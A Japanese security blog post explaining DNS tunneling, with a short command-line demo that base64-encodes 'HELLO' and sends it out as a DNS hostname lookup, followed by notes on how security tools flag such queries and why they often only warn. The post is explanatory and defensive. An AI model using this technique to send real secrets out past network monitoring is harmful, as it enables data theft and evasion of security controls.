UJP - DNSトンネリング

Life is fun and easy!

不正IP報告数

Okan Sensor
 
メイン
ログイン
ブログ カテゴリ一覧

  • カテゴリ セキュリティ の最新配信
  • RSS
  • RDF
  • ATOM

ブログ - DNSトンネリング

DNSトンネリング

カテゴリ : 
セキュリティ » 攻撃/ブルートフォース
ブロガー : 
ujpblog 2024/5/28 13:34
 DNSトンネリングの実演はこんな感じ.

 送信したい秘密のデータが"HELLO"だとして,それを一見わからないように暗号化.今回の場合はbase64でエンコード.
$ echo HELLO |base64🆑
SEVMTE8K
$
 エンコードしたデータをホスト部としてDNSルックアップする.

$ dig SEVMTE8K.google.com🆑

; <<>> DiG 9.10.6 <<>> SEVMTE8K.google.com
;; global options: +cmd
;; Got answer:

;; QUESTION SECTION:
;SEVMTE8K.google.com.		IN	A🈁
$
 そんなホストは無いと返答がある.

 これでgoogle.comのDNSサーバには,SEVMTE8Kというホスト名を検索したというDNSログが残る.DNSクエリを送った対象サーバが悪のあるデータ収集サーバだったら...

 悪意のあるプログラムが,DNSリクエストに偽装してデータを送信することでセキュリティゲートウェイやツールでの検知を逃れるのがDNSトンネリング.

 よってよくわからない命名規則のホスト名になるSEVMTE8KSEVMTE8KSEVMTE8K.google.comとかの場合,セキュリティツールで検知するように動作する場合がある.
 クラウドサービスを使っていてサーバをオートスケールにしている場合,ホスト名はランダムでユニークなものが付与されて時としてSEVMTE8KSEVMTE8KSEVMTE8Kみたいなホスト名になるので,それが検知される場合がある.

 情報漏洩になる事象なのか,過検知なのかは,自動では判明しづらいが,セキュリティツールで検知したとしてもワーニング程度にしていることが多い.つまりアラートは通知されるけど通信は止めない.


ハッカーは秘密通信とファイアウォールのバイパスのために DNS トンネリングを悪用する
https://community.riskiq.com/article/7f0d7aa3

引用:
Palo Alto は、ハッカーが DNS トンネリングを秘密の通信方法として、また従来のセキュリティ対策を回避するためにどのように利用しているかについて説明します。

トラックバック


広告スペース
Google